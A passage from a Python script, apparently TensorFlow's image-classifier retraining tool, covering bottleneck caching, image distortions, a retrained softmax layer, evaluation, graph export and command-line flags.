jpeg_data_tensor,\n decoded_image_tensor, resized_input_tensor,\n bottleneck_tensor):\n \"\"\"Create a single bottleneck file.\"\"\"\n logging.debug('Creating bottleneck at %s', bottleneck_path)\n image_path = get_image_path(image_lists, label_name, index,\n image_dir, category)\n if not tf.gfile.Exists(image_path):\n logging.fatal('File does not exist %s', image_path)\n image_data = tf.gfile.GFile(image_path, 'rb').read()\n try:\n bottleneck_values = run_bottleneck_on_image(\n sess, image_data, jpeg_data_tensor, decoded_image_tensor,\n resized_input_tensor, bottleneck_tensor)\n except Exception as e:\n raise RuntimeError('Error during processing file %s (%s)' % (image_path,\n str(e)))\n bottleneck_string = ','.join(str(x) for x in bottleneck_values)\n with tf.gfile.GFile(bottleneck_path, 'w') as bottleneck_file:\n bottleneck_file.write(bottleneck_string)\n\n\ndef get_or_create_bottleneck(sess, image_lists, label_name, index, image_dir,\n category, bottleneck_dir, jpeg_data_tensor,\n decoded_image_tensor, resized_input_tensor,\n bottleneck_tensor, module_name):\n \"\"\"Retrieves or calculates bottleneck values for an image.\n\n If a cached version of the bottleneck data exists on-disk, return that,\n otherwise calculate the data and save it to disk for future use.\n\n Args:\n sess: The current active TensorFlow Session.\n image_lists: OrderedDict of training images for each label.\n label_name: Label string we want to get an image for.\n index: Integer offset of the image we want. This will be modulo-ed by the\n available number of images for the label, so it can be arbitrarily large.\n image_dir: Root folder string of the subfolders containing the training\n images.\n category: Name string of which set to pull images from - training, testing,\n or validation.\n bottleneck_dir: Folder string holding cached files of bottleneck values.\n jpeg_data_tensor: The tensor to feed loaded jpeg data into.\n decoded_image_tensor: The output of decoding and resizing the image.\n resized_input_tensor: The input node of the recognition graph.\n bottleneck_tensor: The output tensor for the bottleneck values.\n module_name: The name of the image module being used.\n\n Returns:\n Numpy array of values produced by the bottleneck layer for the image.\n \"\"\"\n label_lists = image_lists[label_name]\n sub_dir = label_lists['dir']\n sub_dir_path = os.path.join(bottleneck_dir, sub_dir)\n ensure_dir_exists(sub_dir_path)\n bottleneck_path = get_bottleneck_path(image_lists, label_name, index,\n bottleneck_dir, category, module_name)\n if not os.path.exists(bottleneck_path):\n create_bottleneck_file(bottleneck_path, image_lists, label_name, index,\n image_dir, category, sess, jpeg_data_tensor,\n decoded_image_tensor, resized_input_tensor,\n bottleneck_tensor)\n with tf.gfile.GFile(bottleneck_path, 'r') as bottleneck_file:\n bottleneck_string = bottleneck_file.read()\n did_hit_error = False\n try:\n bottleneck_values = [float(x) for x in bottleneck_string.split(',')]\n except ValueError:\n logging.warning('Invalid float found, recreating bottleneck')\n did_hit_error = True\n if did_hit_error:\n create_bottleneck_file(bottleneck_path, image_lists, label_name, index,\n image_dir, category, sess, jpeg_data_tensor,\n decoded_image_tensor, resized_input_tensor,\n bottleneck_tensor)\n with tf.gfile.GFile(bottleneck_path, 'r') as bottleneck_file:\n bottleneck_string = bottleneck_file.read()\n # Allow exceptions to propagate here, since they shouldn't happen after a\n # fresh creation\n bottleneck_values = [float(x) for x in bottleneck_string.split(',')]\n return bottleneck_values\n\n\ndef cache_bottlenecks(sess, image_lists, image_dir, bottleneck_dir,\n jpeg_data_tensor, decoded_image_tensor,\n resized_input_tensor, bottleneck_tensor, module_name):\n \"\"\"Ensures all the training, testing, and validation bottlenecks are cached.\n\n Because we're likely to read the same image multiple times (if there are no\n distortions applied during training) it can speed things up a lot if we\n calculate the bottleneck layer values once for each image during\n preprocessing, and then just read those cached values repeatedly during\n training. Here we go through all the images we've found, calculate those\n values, and save them off.\n\n Args:\n sess: The current active TensorFlow Session.\n image_lists: OrderedDict of training images for each label.\n image_dir: Root folder string of the subfolders containing the training\n images.\n bottleneck_dir: Folder string holding cached files of bottleneck values.\n jpeg_data_tensor: Input tensor for jpeg data from file.\n decoded_image_tensor: The output of decoding and resizing the image.\n resized_input_tensor: The input node of the recognition graph.\n bottleneck_tensor: The penultimate output layer of the graph.\n module_name: The name of the image module being used.\n\n Returns:\n Nothing.\n \"\"\"\n how_many_bottlenecks = 0\n ensure_dir_exists(bottleneck_dir)\n for label_name, label_lists in image_lists.items():\n for category in ['training', 'testing', 'validation']:\n category_list = label_lists[category]\n for index, unused_base_name in enumerate(category_list):\n get_or_create_bottleneck(\n sess, image_lists, label_name, index, image_dir, category,\n bottleneck_dir, jpeg_data_tensor, decoded_image_tensor,\n resized_input_tensor, bottleneck_tensor, module_name)\n\n how_many_bottlenecks += 1\n if how_many_bottlenecks % 100 == 0:\n logging.info('%s bottleneck files created.', how_many_bottlenecks)\n\n\ndef get_random_cached_bottlenecks(sess, image_lists, how_many, category,\n bottleneck_dir, image_dir, jpeg_data_tensor,\n decoded_image_tensor, resized_input_tensor,\n bottleneck_tensor, module_name):\n \"\"\"Retrieves bottleneck values for cached images.\n\n If no distortions are being applied, this function can retrieve the cached\n bottleneck values directly from disk for images. It picks a random set of\n images from the specified category.\n\n Args:\n sess: Current TensorFlow Session.\n image_lists: OrderedDict of training images for each label.\n how_many: If positive, a random sample of this size will be chosen.\n If negative, all bottlenecks will be retrieved.\n category: Name string of which set to pull from - training, testing, or\n validation.\n bottleneck_dir: Folder string holding cached files of bottleneck values.\n image_dir: Root folder string of the subfolders containing the training\n images.\n jpeg_data_tensor: The layer to feed jpeg image data into.\n decoded_image_tensor: The output of decoding and resizing the image.\n resized_input_tensor: The input node of the recognition graph.\n bottleneck_tensor: The bottleneck output layer of the CNN graph.\n module_name: The name of the image module being used.\n\n Returns:\n List of bottleneck arrays, their corresponding ground truths, and the\n relevant filenames.\n \"\"\"\n class_count = len(image_lists.keys())\n bottlenecks = []\n ground_truths = []\n filenames = []\n if how_many >= 0:\n # Retrieve a random sample of bottlenecks.\n for unused_i in range(how_many):\n label_index = random.randrange(class_count)\n label_name = list(image_lists.keys())[label_index]\n image_index = random.randrange(MAX_NUM_IMAGES_PER_CLASS + 1)\n image_name = get_image_path(image_lists, label_name, image_index,\n image_dir, category)\n bottleneck = get_or_create_bottleneck(\n sess, image_lists, label_name, image_index, image_dir, category,\n bottleneck_dir, jpeg_data_tensor, decoded_image_tensor,\n resized_input_tensor, bottleneck_tensor, module_name)\n bottlenecks.append(bottleneck)\n ground_truths.append(label_index)\n filenames.append(image_name)\n else:\n # Retrieve all bottlenecks.\n for label_index, label_name in enumerate(image_lists.keys()):\n for image_index, image_name in enumerate(\n image_lists[label_name][category]):\n image_name = get_image_path(image_lists, label_name, image_index,\n image_dir, category)\n bottleneck = get_or_create_bottleneck(\n sess, image_lists, label_name, image_index, image_dir, category,\n bottleneck_dir, jpeg_data_tensor, decoded_image_tensor,\n resized_input_tensor, bottleneck_tensor, module_name)\n bottlenecks.append(bottleneck)\n ground_truths.append(label_index)\n filenames.append(image_name)\n return bottlenecks, ground_truths, filenames\n\n\ndef get_random_distorted_bottlenecks(\n sess, image_lists, how_many, category, image_dir, input_jpeg_tensor,\n distorted_image, resized_input_tensor, bottleneck_tensor):\n \"\"\"Retrieves bottleneck values for training images, after distortions.\n\n If we're training with distortions like crops, scales, or flips, we have to\n recalculate the full model for every image, and so we can't use cached\n bottleneck values. Instead we find random images for the requested category,\n run them through the distortion graph, and then the full graph to get the\n bottleneck results for each.\n\n Args:\n sess: Current TensorFlow Session.\n image_lists: OrderedDict of training images for each label.\n how_many: The integer number of bottleneck values to return.\n category: Name string of which set of images to fetch - training, testing,\n or validation.\n image_dir: Root folder string of the subfolders containing the training\n images.\n input_jpeg_tensor: The input layer we feed the image data to.\n distorted_image: The output node of the distortion graph.\n resized_input_tensor: The input node of the recognition graph.\n bottleneck_tensor: The bottleneck output layer of the CNN graph.\n\n Returns:\n List of bottleneck arrays and their corresponding ground truths.\n \"\"\"\n class_count = len(image_lists.keys())\n bottlenecks = []\n ground_truths = []\n for unused_i in range(how_many):\n label_index = random.randrange(class_count)\n label_name = list(image_lists.keys())[label_index]\n image_index = random.randrange(MAX_NUM_IMAGES_PER_CLASS + 1)\n image_path = get_image_path(image_lists, label_name, image_index, image_dir,\n category)\n if not tf.gfile.Exists(image_path):\n logging.fatal('File does not exist %s', image_path)\n jpeg_data = tf.gfile.GFile(image_path, 'rb').read()\n # Note that we materialize the distorted_image_data as a numpy array before\n # sending running inference on the image. This involves 2 memory copies and\n # might be optimized in other implementations.\n distorted_image_data = sess.run(distorted_image,\n {input_jpeg_tensor: jpeg_data})\n bottleneck_values = sess.run(bottleneck_tensor,\n {resized_input_tensor: distorted_image_data})\n bottleneck_values = np.squeeze(bottleneck_values)\n bottlenecks.append(bottleneck_values)\n ground_truths.append(label_index)\n return bottlenecks, ground_truths\n\n\ndef should_distort_images(flip_left_right, random_crop, random_scale,\n random_brightness):\n \"\"\"Whether any distortions are enabled, from the input flags.\n\n Args:\n flip_left_right: Boolean whether to randomly mirror images horizontally.\n random_crop: Integer percentage setting the total margin used around the\n crop box.\n random_scale: Integer percentage of how much to vary the scale by.\n random_brightness: Integer range to randomly multiply the pixel values by.\n\n Returns:\n Boolean value indicating whether any distortions should be applied.\n \"\"\"\n return (flip_left_right or (random_crop != 0) or (random_scale != 0) or\n (random_brightness != 0))\n\n\ndef add_input_distortions(flip_left_right, random_crop, random_scale,\n random_brightness, module_spec):\n \"\"\"Creates the operations to apply the specified distortions.\n\n During training it can help to improve the results if we run the images\n through simple distortions like crops, scales, and flips. These reflect the\n kind of variations we expect in the real world, and so can help train the\n model to cope with natural data more effectively. Here we take the supplied\n parameters and construct a network of operations to apply them to an image.\n\n Cropping\n ~~~~~~~~\n\n Cropping is done by placing a bounding box at a random position in the full\n image. The cropping parameter controls the size of that box relative to the\n input image. If it's zero, then the box is the same size as the input and no\n cropping is performed. If the value is 50%, then the crop box will be half the\n width and height of the input. In a diagram it looks like this:\n\n < width >\n +---------------------+\n | |\n | width - crop% |\n | < > |\n | +------+ |\n | | | |\n | | | |\n | | | |\n | +------+ |\n | |\n | |\n +---------------------+\n\n Scaling\n ~~~~~~~\n\n Scaling is a lot like cropping, except that the bounding box is always\n centered and its size varies randomly within the given range. For example if\n the scale percentage is zero, then the bounding box is the same size as the\n input and no scaling is applied. If it's 50%, then the bounding box will be in\n a random range between half the width and height and full size.\n\n Args:\n flip_left_right: Boolean whether to randomly mirror images horizontally.\n random_crop: Integer percentage setting the total margin used around the\n crop box.\n random_scale: Integer percentage of how much to vary the scale by.\n random_brightness: Integer range to randomly multiply the pixel values by.\n graph.\n module_spec: The hub.ModuleSpec for the image module being used.\n\n Returns:\n The jpeg input layer and the distorted result tensor.\n \"\"\"\n input_height, input_width = hub.get_expected_image_size(module_spec)\n input_depth = hub.get_num_image_channels(module_spec)\n jpeg_data = tf.placeholder(tf.string, name='DistortJPGInput')\n decoded_image = tf.image.decode_jpeg(jpeg_data, channels=input_depth)\n # Convert from full range of uint8 to range [0,1] of float32.\n decoded_image_as_float = tf.image.convert_image_dtype(decoded_image,\n tf.float32)\n decoded_image_4d = tf.expand_dims(decoded_image_as_float, 0)\n margin_scale = 1.0 + (random_crop / 100.0)\n resize_scale = 1.0 + (random_scale / 100.0)\n margin_scale_value = tf.constant(margin_scale)\n resize_scale_value = tf.random_uniform(shape=[],\n minval=1.0,\n maxval=resize_scale)\n scale_value = tf.multiply(margin_scale_value, resize_scale_value)\n precrop_width = tf.multiply(scale_value, input_width)\n precrop_height = tf.multiply(scale_value, input_height)\n precrop_shape = tf.stack([precrop_height, precrop_width])\n precrop_shape_as_int = tf.cast(precrop_shape, dtype=tf.int32)\n precropped_image = tf.image.resize_bilinear(decoded_image_4d,\n precrop_shape_as_int)\n precropped_image_3d = tf.squeeze(precropped_image, axis=[0])\n cropped_image = tf.random_crop(precropped_image_3d,\n [input_height, input_width, input_depth])\n if flip_left_right:\n flipped_image = tf.image.random_flip_left_right(cropped_image)\n else:\n flipped_image = cropped_image\n brightness_min = 1.0 - (random_brightness / 100.0)\n brightness_max = 1.0 + (random_brightness / 100.0)\n brightness_value = tf.random_uniform(shape=[],\n minval=brightness_min,\n maxval=brightness_max)\n brightened_image = tf.multiply(flipped_image, brightness_value)\n distort_result = tf.expand_dims(brightened_image, 0, name='DistortResult')\n return jpeg_data, distort_result\n\n\ndef variable_summaries(var):\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n with tf.name_scope('summaries'):\n mean = tf.reduce_mean(var)\n tf.summary.scalar('mean', mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n tf.summary.histogram('histogram', var)\n\n\ndef add_final_retrain_ops(class_count, final_tensor_name, bottleneck_tensor,\n quantize_layer, is_training):\n \"\"\"Adds a new softmax and fully-connected layer for training and eval.\n\n We need to retrain the top layer to identify our new classes, so this function\n adds the right operations to the graph, along with some variables to hold the\n weights, and then sets up all the gradients for the backward pass.\n\n The set up for the softmax and fully-connected layers is based on:\n https://www.tensorflow.org/tutorials/mnist/beginners/index.html\n\n Args:\n class_count: Integer of how many categories of things we're trying to\n recognize.\n final_tensor_name: Name string for the new final node that produces results.\n bottleneck_tensor: The output of the main CNN graph.\n quantize_layer: Boolean, specifying whether the newly added layer should be\n instrumented for quantization with TF-Lite.\n is_training: Boolean, specifying whether the newly add layer is for training\n or eval.\n\n Returns:\n The tensors for the training and cross entropy results, and tensors for the\n bottleneck input and ground truth input.\n \"\"\"\n batch_size, bottleneck_tensor_size = bottleneck_tensor.get_shape().as_list()\n assert batch_size is None, 'We want to work with arbitrary batch size.'\n with tf.name_scope('input'):\n bottleneck_input = tf.placeholder_with_default(\n bottleneck_tensor,\n shape=[batch_size, bottleneck_tensor_size],\n name='BottleneckInputPlaceholder')\n\n ground_truth_input = tf.placeholder(\n tf.int64, [batch_size], name='GroundTruthInput')\n\n # Organizing the following ops so they are easier to see in TensorBoard.\n layer_name = 'final_retrain_ops'\n with tf.name_scope(layer_name):\n with tf.name_scope('weights'):\n initial_value = tf.truncated_normal(\n [bottleneck_tensor_size, class_count], stddev=0.001)\n layer_weights = tf.Variable(initial_value, name='final_weights')\n variable_summaries(layer_weights)\n\n with tf.name_scope('biases'):\n layer_biases = tf.Variable(tf.zeros([class_count]), name='final_biases')\n variable_summaries(layer_biases)\n\n with tf.name_scope('Wx_plus_b'):\n logits = tf.matmul(bottleneck_input, layer_weights) + layer_biases\n tf.summary.histogram('pre_activations', logits)\n\n final_tensor = tf.nn.softmax(logits, name=final_tensor_name)\n\n # The tf.contrib.quantize functions rewrite the graph in place for\n # quantization. The imported model graph has already been rewritten, so upon\n # calling these rewrites, only the newly added final layer will be\n # transformed.\n if quantize_layer:\n if is_training:\n contrib_quantize.create_training_graph()\n else:\n contrib_quantize.create_eval_graph()\n\n tf.summary.histogram('activations', final_tensor)\n\n # If this is an eval graph, we don't need to add loss ops or an optimizer.\n if not is_training:\n return None, None, bottleneck_input, ground_truth_input, final_tensor\n\n with tf.name_scope('cross_entropy'):\n cross_entropy_mean = tf.losses.sparse_softmax_cross_entropy(\n labels=ground_truth_input, logits=logits)\n\n tf.summary.scalar('cross_entropy', cross_entropy_mean)\n\n with tf.name_scope('train'):\n optimizer = tf.train.GradientDescentOptimizer(FLAGS.learning_rate)\n train_step = optimizer.minimize(cross_entropy_mean)\n\n return (train_step, cross_entropy_mean, bottleneck_input, ground_truth_input,\n final_tensor)\n\n\ndef add_evaluation_step(result_tensor, ground_truth_tensor):\n \"\"\"Inserts the operations we need to evaluate the accuracy of our results.\n\n Args:\n result_tensor: The new final node that produces results.\n ground_truth_tensor: The node we feed ground truth data\n into.\n\n Returns:\n Tuple of (evaluation step, prediction).\n \"\"\"\n with tf.name_scope('accuracy'):\n with tf.name_scope('correct_prediction'):\n prediction = tf.argmax(result_tensor, 1)\n correct_prediction = tf.equal(prediction, ground_truth_tensor)\n with tf.name_scope('accuracy'):\n evaluation_step = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n tf.summary.scalar('accuracy', evaluation_step)\n return evaluation_step, prediction\n\n\ndef run_final_eval(train_session, module_spec, class_count, image_lists,\n jpeg_data_tensor, decoded_image_tensor,\n resized_image_tensor, bottleneck_tensor):\n \"\"\"Runs a final evaluation on an eval graph using the test data set.\n\n Args:\n train_session: Session for the train graph with the tensors below.\n module_spec: The hub.ModuleSpec for the image module being used.\n class_count: Number of classes\n image_lists: OrderedDict of training images for each label.\n jpeg_data_tensor: The layer to feed jpeg image data into.\n decoded_image_tensor: The output of decoding and resizing the image.\n resized_image_tensor: The input node of the recognition graph.\n bottleneck_tensor: The bottleneck output layer of the CNN graph.\n \"\"\"\n test_bottlenecks, test_ground_truth, test_filenames = (\n get_random_cached_bottlenecks(train_session, image_lists,\n FLAGS.test_batch_size,\n 'testing', FLAGS.bottleneck_dir,\n FLAGS.image_dir, jpeg_data_tensor,\n decoded_image_tensor, resized_image_tensor,\n bottleneck_tensor, FLAGS.tfhub_module))\n\n (eval_session, _, bottleneck_input, ground_truth_input, evaluation_step,\n prediction) = build_eval_session(module_spec, class_count)\n test_accuracy, predictions = eval_session.run(\n [evaluation_step, prediction],\n feed_dict={\n bottleneck_input: test_bottlenecks,\n ground_truth_input: test_ground_truth\n })\n logging.info('Final test accuracy = %.1f%% (N=%d)',\n test_accuracy * 100, len(test_bottlenecks))\n\n if FLAGS.print_misclassified_test_images:\n logging.info('=== MISCLASSIFIED TEST IMAGES ===')\n for i, test_filename in enumerate(test_filenames):\n if predictions[i] != test_ground_truth[i]:\n logging.info('%70s %s', test_filename,\n list(image_lists.keys())[predictions[i]])\n\n\ndef build_eval_session(module_spec, class_count):\n \"\"\"Builds an restored eval session without train operations for exporting.\n\n Args:\n module_spec: The hub.ModuleSpec for the image module being used.\n class_count: Number of classes\n\n Returns:\n Eval session containing the restored eval graph.\n The bottleneck input, ground truth, eval step, and prediction tensors.\n \"\"\"\n # If quantized, we need to create the correct eval graph for exporting.\n eval_graph, bottleneck_tensor, resized_input_tensor, wants_quantization = (\n create_module_graph(module_spec))\n\n eval_sess = tf.Session(graph=eval_graph)\n with eval_graph.as_default():\n # Add the new layer for exporting.\n (_, _, bottleneck_input,\n ground_truth_input, final_tensor) = add_final_retrain_ops(\n class_count, FLAGS.final_tensor_name, bottleneck_tensor,\n wants_quantization, is_training=False)\n\n # Now we need to restore the values from the training graph to the eval\n # graph.\n tf.train.Saver().restore(eval_sess, FLAGS.checkpoint_path)\n\n evaluation_step, prediction = add_evaluation_step(final_tensor,\n ground_truth_input)\n\n return (eval_sess, resized_input_tensor, bottleneck_input, ground_truth_input,\n evaluation_step, prediction)\n\n\ndef save_graph_to_file(graph_file_name, module_spec, class_count):\n \"\"\"Saves an graph to file, creating a valid quantized one if necessary.\"\"\"\n sess, _, _, _, _, _ = build_eval_session(module_spec, class_count)\n graph = sess.graph\n\n output_graph_def = tf.graph_util.convert_variables_to_constants(\n sess, graph.as_graph_def(), [FLAGS.final_tensor_name])\n\n with tf.gfile.GFile(graph_file_name, 'wb') as f:\n f.write(output_graph_def.SerializeToString())\n\n\ndef prepare_file_system():\n # Set up the directory we'll write summaries to for TensorBoard\n if tf.gfile.Exists(FLAGS.summaries_dir):\n tf.gfile.DeleteRecursively(FLAGS.summaries_dir)\n tf.gfile.MakeDirs(FLAGS.summaries_dir)\n if FLAGS.intermediate_store_frequency > 0:\n ensure_dir_exists(FLAGS.intermediate_output_graphs_dir)\n return\n\n\ndef add_jpeg_decoding(module_spec):\n \"\"\"Adds operations that perform JPEG decoding and resizing to the graph..\n\n Args:\n module_spec: The hub.ModuleSpec for the image module being used.\n\n Returns:\n Tensors for the node to feed JPEG data into, and the output of the\n preprocessing steps.\n \"\"\"\n input_height, input_width = hub.get_expected_image_size(module_spec)\n input_depth = hub.get_num_image_channels(module_spec)\n jpeg_data = tf.placeholder(tf.string, name='DecodeJPGInput')\n decoded_image = tf.image.decode_jpeg(jpeg_data, channels=input_depth)\n # Convert from full range of uint8 to range [0,1] of float32.\n decoded_image_as_float = tf.image.convert_image_dtype(decoded_image,\n tf.float32)\n decoded_image_4d = tf.expand_dims(decoded_image_as_float, 0)\n resize_shape = tf.stack([input_height, input_width])\n resize_shape_as_int = tf.cast(resize_shape, dtype=tf.int32)\n resized_image = tf.image.resize_bilinear(decoded_image_4d,\n resize_shape_as_int)\n return jpeg_data, resized_image\n\n\ndef export_model(module_spec, class_count, saved_model_dir):\n \"\"\"Exports model for serving.\n\n Args:\n module_spec: The hub.ModuleSpec for the image module being used.\n class_count: The number of classes.\n saved_model_dir: Directory in which to save exported model and variables.\n \"\"\"\n # The SavedModel should hold the eval graph.\n sess, in_image, _, _, _, _ = build_eval_session(module_spec, class_count)\n with sess.graph.as_default() as graph:\n tf.saved_model.simple_save(\n sess,\n saved_model_dir,\n inputs={'image': in_image},\n outputs={'prediction': graph.get_tensor_by_name('final_result:0')},\n legacy_init_op=tf.group(tf.tables_initializer(), name='legacy_init_op')\n )\n\n\ndef logging_level_verbosity(logging_verbosity):\n \"\"\"Converts logging_level into TensorFlow logging verbosity value.\n\n Args:\n logging_verbosity: String value representing logging level: 'DEBUG', 'INFO',\n 'WARN', 'ERROR', 'FATAL'\n \"\"\"\n name_to_level = {\n 'FATAL': logging.FATAL,\n 'ERROR': logging.ERROR,\n 'WARN': logging.WARN,\n 'INFO': logging.INFO,\n 'DEBUG': logging.DEBUG\n }\n\n try:\n return name_to_level[logging_verbosity]\n except Exception as e:\n raise RuntimeError('Not supported logs verbosity (%s). Use one of %s.' %\n (str(e), list(name_to_level)))\n\n\ndef main(_):\n # Needed to make sure the logging output is visible.\n # See https://github.com/tensorflow/tensorflow/issues/3047\n logging_verbosity = logging_level_verbosity(FLAGS.logging_verbosity)\n logging.set_verbosity(logging_verbosity)\n\n logging.error('WARNING: This tool is deprecated in favor of '\n 'https://github.com/tensorflow/hub/tree/master/'\n 'tensorflow_hub/tools/make_image_classifier')\n\n if not FLAGS.image_dir:\n logging.error('Must set flag --image_dir.')\n return -1\n\n # Prepare necessary directories that can be used during training\n prepare_file_system()\n\n # Look at the folder structure, and create lists of all the images.\n image_lists = create_image_lists(FLAGS.image_dir, FLAGS.testing_percentage,\n FLAGS.validation_percentage)\n class_count = len(image_lists.keys())\n if class_count == 0:\n logging.error('No valid folders of images found at %s', FLAGS.image_dir)\n return -1\n if class_count == 1:\n logging.error('Only one valid folder of images found at %s '\n ' - multiple classes are needed for classification.',\n FLAGS.image_dir)\n return -1\n\n # See if the command-line flags mean we're applying any distortions.\n do_distort_images = should_distort_images(\n FLAGS.flip_left_right, FLAGS.random_crop, FLAGS.random_scale,\n FLAGS.random_brightness)\n\n # Set up the pre-trained graph.\n module_spec = hub.load_module_spec(FLAGS.tfhub_module)\n graph, bottleneck_tensor, resized_image_tensor, wants_quantization = (\n create_module_graph(module_spec))\n\n # Add the new layer that we'll be training.\n with graph.as_default():\n (train_step, cross_entropy, bottleneck_input,\n ground_truth_input, final_tensor) = add_final_retrain_ops(\n class_count, FLAGS.final_tensor_name, bottleneck_tensor,\n wants_quantization, is_training=True)\n\n with tf.Session(graph=graph) as sess:\n # Initialize all weights: for the module to their pretrained values,\n # and for the newly added retraining layer to random initial values.\n init = tf.global_variables_initializer()\n sess.run(init)\n\n # Set up the image decoding sub-graph.\n jpeg_data_tensor, decoded_image_tensor = add_jpeg_decoding(module_spec)\n\n if do_distort_images:\n # We will be applying distortions, so set up the operations we'll need.\n (distorted_jpeg_data_tensor,\n distorted_image_tensor) = add_input_distortions(\n FLAGS.flip_left_right, FLAGS.random_crop, FLAGS.random_scale,\n FLAGS.random_brightness, module_spec)\n else:\n # We'll make sure we've calculated the 'bottleneck' image summaries and\n # cached them on disk.\n cache_bottlenecks(sess, image_lists, FLAGS.image_dir,\n FLAGS.bottleneck_dir, jpeg_data_tensor,\n decoded_image_tensor, resized_image_tensor,\n bottleneck_tensor, FLAGS.tfhub_module)\n\n # Create the operations we need to evaluate the accuracy of our new layer.\n evaluation_step, _ = add_evaluation_step(final_tensor, ground_truth_input)\n\n # Merge all the summaries and write them out to the summaries_dir\n merged = tf.summary.merge_all()\n train_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/train',\n sess.graph)\n\n validation_writer = tf.summary.FileWriter(\n FLAGS.summaries_dir + '/validation')\n\n # Create a train saver that is used to restore values into an eval graph\n # when exporting models.\n train_saver = tf.train.Saver()\n\n # Run the training for as many cycles as requested on the command line.\n for i in range(FLAGS.how_many_training_steps):\n # Get a batch of input bottleneck values, either calculated fresh every\n # time with distortions applied, or from the cache stored on disk.\n if do_distort_images:\n (train_bottlenecks,\n train_ground_truth) = get_random_distorted_bottlenecks(\n sess, image_lists, FLAGS.train_batch_size, 'training',\n FLAGS.image_dir, distorted_jpeg_data_tensor,\n distorted_image_tensor, resized_image_tensor, bottleneck_tensor)\n else:\n (train_bottlenecks,\n train_ground_truth, _) = get_random_cached_bottlenecks(\n sess, image_lists, FLAGS.train_batch_size, 'training',\n FLAGS.bottleneck_dir, FLAGS.image_dir, jpeg_data_tensor,\n decoded_image_tensor, resized_image_tensor, bottleneck_tensor,\n FLAGS.tfhub_module)\n # Feed the bottlenecks and ground truth into the graph, and run a training\n # step. Capture training summaries for TensorBoard with the `merged` op.\n train_summary, _ = sess.run(\n [merged, train_step],\n feed_dict={bottleneck_input: train_bottlenecks,\n ground_truth_input: train_ground_truth})\n train_writer.add_summary(train_summary, i)\n\n # Every so often, print out how well the graph is training.\n is_last_step = (i + 1 == FLAGS.how_many_training_steps)\n if (i % FLAGS.eval_step_interval) == 0 or is_last_step:\n train_accuracy, cross_entropy_value = sess.run(\n [evaluation_step, cross_entropy],\n feed_dict={bottleneck_input: train_bottlenecks,\n ground_truth_input: train_ground_truth})\n logging.info('%s: Step %d: Train accuracy = %.1f%%',\n datetime.now(), i, train_accuracy * 100)\n logging.info('%s: Step %d: Cross entropy = %f',\n datetime.now(), i, cross_entropy_value)\n # TODO: Make this use an eval graph, to avoid quantization\n # moving averages being updated by the validation set, though in\n # practice this makes a negligable difference.\n validation_bottlenecks, validation_ground_truth, _ = (\n get_random_cached_bottlenecks(\n sess, image_lists, FLAGS.validation_batch_size, 'validation',\n FLAGS.bottleneck_dir, FLAGS.image_dir, jpeg_data_tensor,\n decoded_image_tensor, resized_image_tensor, bottleneck_tensor,\n FLAGS.tfhub_module))\n # Run a validation step and capture training summaries for TensorBoard\n # with the `merged` op.\n validation_summary, validation_accuracy = sess.run(\n [merged, evaluation_step],\n feed_dict={bottleneck_input: validation_bottlenecks,\n ground_truth_input: validation_ground_truth})\n validation_writer.add_summary(validation_summary, i)\n logging.info('%s: Step %d: Validation accuracy = %.1f%% (N=%d)',\n datetime.now(), i, validation_accuracy * 100,\n len(validation_bottlenecks))\n\n # Store intermediate results\n intermediate_frequency = FLAGS.intermediate_store_frequency\n\n if (intermediate_frequency > 0 and (i % intermediate_frequency == 0)\n and i > 0):\n # If we want to do an intermediate save, save a checkpoint of the train\n # graph, to restore into the eval graph.\n train_saver.save(sess, FLAGS.checkpoint_path)\n intermediate_file_name = (FLAGS.intermediate_output_graphs_dir +\n 'intermediate_' + str(i) + '.pb')\n logging.info('Save intermediate result to : %s', intermediate_file_name)\n save_graph_to_file(intermediate_file_name, module_spec,\n class_count)\n\n # After training is complete, force one last save of the train checkpoint.\n train_saver.save(sess, FLAGS.checkpoint_path)\n\n # We've completed all our training, so run a final test evaluation on\n # some new images we haven't used before.\n run_final_eval(sess, module_spec, class_count, image_lists,\n jpeg_data_tensor, decoded_image_tensor, resized_image_tensor,\n bottleneck_tensor)\n\n # Write out the trained graph and labels with the weights stored as\n # constants.\n logging.info('Save final result to : %s', FLAGS.output_graph)\n if wants_quantization:\n logging.info('The model is instrumented for quantization with TF-Lite')\n save_graph_to_file(FLAGS.output_graph, module_spec, class_count)\n with tf.gfile.GFile(FLAGS.output_labels, 'w') as f:\n f.write('\\n'.join(image_lists.keys()) + '\\n')\n\n if FLAGS.saved_model_dir:\n export_model(module_spec, class_count, FLAGS.saved_model_dir)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--image_dir',\n type=str,\n default='',\n help='Path to folders of labeled images.'\n )\n parser.add_argument(\n '--output_graph',\n type=str,\n default='/tmp/output_graph.pb',\n help='Where to save the trained graph.'\n )\n parser.add_argument(\n '--intermediate_output_graphs_dir',\n type=str,\n default='/tmp/intermediate_graph/',\n help='Where to save the intermediate graphs.'\n )\n parser.add_argument(\n '--intermediate_store_frequency',\n type=int,\n default=0,\n help=\"\"\"\\\n How many steps to store intermediate graph. If \"0\" then will not\n store.\\\n \"\"\"\n )\n parser.add_argument(\n '--output_labels',\n type=str,\n default='/tmp/output_labels.txt',\n help='Where to save the trained graph\\'s labels.'\n )\n parser.add_argument(\n '--summaries_dir',\n type=str,\n default='/tmp/retrain_logs',\n help='Where to save summary logs for TensorBoard.'\n )\n parser.add_argument(\n '--how_many_training_steps',\n type=int,\n default=4000,\n help='How many training steps to run before ending.'\n )\n parser.add_argument(\n '--learning_rate',\n type=float,\n default=0.01,\n help='How large a learning rate to use when training.'\n )\n parser.add_argument(\n '--testing_percentage',\n type=int,\n default=10,\n help='What percentage of images to use as a test set.'\n )\n parser.add_argument(\n '--validation_percentage',\n type=int,\n default=10,\n help='What percentage of images to use as a validation set.'\n )\n parser.add_argument(\n '--eval_step_interval',\n type=int,\n default=10,\n help='How often to evaluate the training results.'\n )\n parser.add_argument(\n '--train_batch_size',\n type=int,\n default=100,\n help='How many images to train on at a time.'\n )\n parser.add_argument(\n '--test_batch_size',\n type=int,\n default=-1,\n help=\"\"\"\\\n How many images to test on. This test set is only used once, to evaluate\n the final accuracy of the model after training completes.\n A value of -1 causes the entire test set to be used, 